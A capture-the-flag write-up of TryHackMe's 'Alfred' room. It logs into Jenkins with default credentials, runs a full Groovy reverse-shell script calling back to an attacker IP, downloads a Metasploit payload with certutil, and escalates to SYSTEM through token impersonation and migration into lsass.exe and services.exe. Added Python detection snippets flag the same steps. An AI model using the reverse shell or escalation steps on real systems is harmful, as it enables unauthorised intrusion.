TryHackMe-Alfred

ZeusCybersec
5 min read, Jul 10, 2021

This room covers how to exploit a common misconfiguration on a widely used automation server (Jenkins), which is used to create continuous integration/continuous development pipelines that let developers automatically deploy their code once they make a change to it. After that, we'll use privilege escalation to get full system access.

We begin with an Nmap scan.

Head over to the web page running on port 8080 and we find a login panel. The default username of Jenkins is "admin". Looking at the length of the username/password answer field, you can already guess it is admin:admin.

Next we could try looking for an exploit for the version of Jenkins that is running, but the room hints at executing commands. So I googled "how to execute commands in jenkins and get a reverse shell" and this is one article I found, which you should read: https://blog.pentesteracademy.com/abusing-jenkins-groovy-script-console-to-get-shell-98b951fa64a6

I tried running the same command shown in the blog above but was unable to get a reverse shell on netcat.

If you read the article above, the console seems to run "Groovy" scripts. Now visit PayloadsAllTheThings and we find a reverse shell for Groovy: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#powershell

If we just try to run the first script, we don't get a reverse connection on netcat. However, if you look carefully, there is a more stealthy option given further down, so let's use it. This is what my final command looks like (make sure to put in your local IP and the netcat listening port):

Thread.start {
    String host = "10.14.11.148"; int port = 4444; String cmd = "cmd.exe";  // your local IP and netcat listening port
    Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
    Socket s = new Socket(host, port);
    InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
    OutputStream po = p.getOutputStream(), so = s.getOutputStream();
    while (!s.isClosed()) {  // relay bytes between the socket and cmd.exe until the process exits
        while (pi.available() > 0) so.write(pi.read()); while (pe.available() > 0) so.write(pe.read());
        while (si.available() > 0) po.write(si.read()); so.flush(); po.flush(); Thread.sleep(50);
        try { p.exitValue(); break; } catch (Exception e) {}
    }
    p.destroy(); s.close();
}

Let's run it.

And sure enough I got a shell on netcat!!!
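As an added defender-side example (not part of the writeup), here is how script console use shows up in Jenkins access logs: only POSTs to /script or /scriptText actually execute Groovy, a GET merely renders the form. The log lines are constructed, and the combined log format and the login endpoint path are assumptions.

```python
import re
from collections import Counter

# Constructed Jenkins access-log lines (NCSA combined format, as a reverse proxy
# or Winstone's access logger would write them); not captured from the room.
SAMPLE_LOG = """\
10.14.11.148 - - [10/Jul/2021:12:01:03 +0000] "GET /login HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
10.14.11.148 - - [10/Jul/2021:12:01:09 +0000] "POST /j_acegi_security_check HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.14.11.148 - admin [10/Jul/2021:12:01:15 +0000] "GET /script HTTP/1.1" 200 8841 "-" "Mozilla/5.0"
10.14.11.148 - admin [10/Jul/2021:12:01:42 +0000] "POST /script HTTP/1.1" 200 9123 "-" "Mozilla/5.0"
10.14.11.148 - admin [10/Jul/2021:12:02:10 +0000] "POST /scriptText HTTP/1.1" 200 12 "-" "curl/7.74.0"
10.0.5.7 - bob [10/Jul/2021:12:03:00 +0000] "GET /job/build/1/console HTTP/1.1" 200 5012 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Script console endpoints: /script renders the form, /scriptText takes raw Groovy.
CONSOLE_PATHS = ("/script", "/scriptText")

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def console_executions(log_text):
    """Return events where Groovy was actually submitted to the script console.
    A GET only renders the form; a POST executes the script body."""
    hits = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if not ev:
            continue
        path = ev["path"].split("?", 1)[0].rstrip("/")
        if ev["method"] == "POST" and path in CONSOLE_PATHS:
            hits.append({**{k: ev[k] for k in ("ts", "ip", "user", "ua")}, "path": path})
    return hits

def summarize(log_text):
    """Count executions per (user, ip): an unexpected actor or a non-browser
    client (curl against /scriptText) stands out immediately."""
    return Counter((h["user"], h["ip"]) for h in console_executions(log_text))

if __name__ == "__main__":
    for h in console_executions(SAMPLE_LOG):
        print(f"{h['ts']} {h['user']}@{h['ip']} POST {h['path']} via {h['ua']}")
    print(summarize(SAMPLE_LOG))
```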

Head over to the directory shown below and you can find the user flag.

user flag

We have a shell, but it would be much better if we had a Meterpreter shell, which is more stable.

Now we will create a payload with msfvenom, then transfer it to the target Windows machine and finally run the executable. We will use Metasploit's multi/handler to catch the connection.

First we create the payload and name it JENKINSPAYLOAD.exe. Once it's made, we start a Python SimpleHTTP server on port 777 to host the file so we can transfer it.

To transfer files to the target Windows machine we can use either "Invoke-WebRequest" or Certutil, which is a really useful tool that you will find handy in other CTFs as well. We type "certutil" and sure enough it exists. Then we use the command shown below to transfer the JENKINSPAYLOAD.exe file to the target machine.

Certutil usage: https://www.ired.team/offensive-security/defense-evasion/downloading-file-with-certutil

Once it has been transferred, let's start our multi/handler in Metasploit.

Let's run our executable using .\JENKINSPAYLOAD.exe

And sure enough you will get a connection in Metasploit!!!

FROM HERE, IF YOU WANT TO BECOME ADMIN AND READ THE FLAG, INSTEAD OF FOLLOWING THE INSTRUCTIONS OF TRYHACKME, YOU CAN SIMPLY DO THIS:

Run the "ps" command and migrate to the "lsass.exe" process. (Windows uses tokens to ensure that accounts have the right privileges to carry out particular actions. Account tokens are assigned to an account when users log in or are authenticated. This is usually done by LSASS.exe; think of this as an authentication process.)

lsass.exe has PID (process ID) 676, which is where we want to migrate to as it runs with higher privileges.

To check whether we are admin (NT AUTHORITY), run the "getuid" command. The root flag can be found in the /config directory.

root.txt

NOW LET'S FOLLOW THE INSTRUCTIONS GIVEN BY TRYHACKME IN TASK 3. Make sure you read the explanation, as it is really valuable for understanding the concept.

whoami /privs doesn't seem to work. Instead we can run the getprivs command.

Run the command "load incognito" and then "list_tokens -g" and follow along.

A bit about load incognito: (Incognito was originally a stand-alone application that allowed you to impersonate user tokens when successfully compromising a system. … They are a temporary key that allows you to access the system and network without having to provide credentials each time you access a file.)

To check which tokens are available, we enter "list_tokens -g".

We can see that the BUILTIN\Administrators token is available. Use the impersonate_token "BUILTIN\Administrators" command to impersonate the Administrators token.

We are not done yet. In order to truly get admin privileges, we need to migrate to a privileged process.

(Explanation: Even though you have a higher privileged token you may not actually have the permissions of a privileged user (this is due to the way Windows handles permissions — it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do). Ensure that you migrate to a process with correct permissions (above question's answer). The safest process to pick is the services.exe process. First use the ps command to view processes and find the PID of the services.exe process. Migrate to this process using the command migrate PID-OF-PROCESS.)

We migrate to "services.exe", which has PID 668.

We finally find the root flag in "C:\Windows\system32\config".
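As an added defender-side example (not from the writeup), here is how the steps above would appear in host telemetry: the Groovy console shell as java.exe spawning cmd.exe, the certutil transfer as a process-creation event, and the migrations into lsass.exe (PID 676) and services.exe (PID 668) as CreateRemoteThread events, with three simple triage rules run over constructed Sysmon-style events. The Jenkins service account name, the install paths and the certutil -urlcache -split -f command form are assumptions.

```python
import json
from pathlib import PureWindowsPath

# Constructed Sysmon-style events as JSON lines (EventID 1 = process creation,
# EventID 8 = CreateRemoteThread); illustrative, not telemetry from the room.
SAMPLE_EVENTS = r"""
{"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Program Files (x86)\\Jenkins\\jre\\bin\\java.exe", "CommandLine": "cmd.exe", "User": "HOST\\svc_jenkins"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\certutil.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "certutil -urlcache -split -f http://10.14.11.148:777/JENKINSPAYLOAD.exe JENKINSPAYLOAD.exe", "User": "HOST\\svc_jenkins"}
{"EventID": 1, "Image": "C:\\Users\\svc_jenkins\\JENKINSPAYLOAD.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": ".\\JENKINSPAYLOAD.exe", "User": "HOST\\svc_jenkins"}
{"EventID": 8, "SourceImage": "C:\\Users\\svc_jenkins\\JENKINSPAYLOAD.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "TargetProcessId": 676, "User": "HOST\\svc_jenkins"}
{"EventID": 8, "SourceImage": "C:\\Users\\svc_jenkins\\JENKINSPAYLOAD.exe", "TargetImage": "C:\\Windows\\System32\\services.exe", "TargetProcessId": 668, "User": "HOST\\svc_jenkins"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe", "User": "HOST\\alice"}
"""

JENKINS_HOSTS = {"java.exe", "javaw.exe"}                   # what the Jenkins service runs as
SHELLS = {"cmd.exe", "powershell.exe"}                      # a build job has no business spawning these
PRIVILEGED = {"lsass.exe", "services.exe", "winlogon.exe"}  # common migrate targets

def basename(path):
    return PureWindowsPath(path).name.lower()

def triage(events_text):
    """Apply three rules to the event stream and return (rule, user, detail) alerts."""
    alerts = []
    for line in events_text.strip().splitlines():
        ev = json.loads(line)
        if ev["EventID"] == 1:
            image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
            cmd = ev.get("CommandLine", "")
            # Rule 1: the Groovy console shell shows up as java.exe -> cmd.exe
            if parent in JENKINS_HOSTS and image in SHELLS:
                alerts.append(("jenkins_spawned_shell", ev["User"], cmd))
            # Rule 2: certutil used as a downloader (LOLBin), not for certificates
            if image == "certutil.exe" and "-urlcache" in cmd.lower() and "http" in cmd.lower():
                alerts.append(("certutil_download", ev["User"], cmd))
        elif ev["EventID"] == 8:
            target = basename(ev["TargetImage"])
            # Rule 3: a thread created inside lsass/services is what "migrate" looks like
            if target in PRIVILEGED:
                alerts.append(("remote_thread_into_" + target, ev["User"], ev["SourceImage"]))
    return alerts

if __name__ == "__main__":
    for rule, user, detail in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {user}: {detail}")
```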

Thanks for checking out this writeup and I hope you learned something by solving this room. -ZEUS


ZeusCybersec

I am a penetration tester, currently pursuing OSCP. Skilled in network pen-testing and developing security tools using Python. YouTube: ZeusCybersec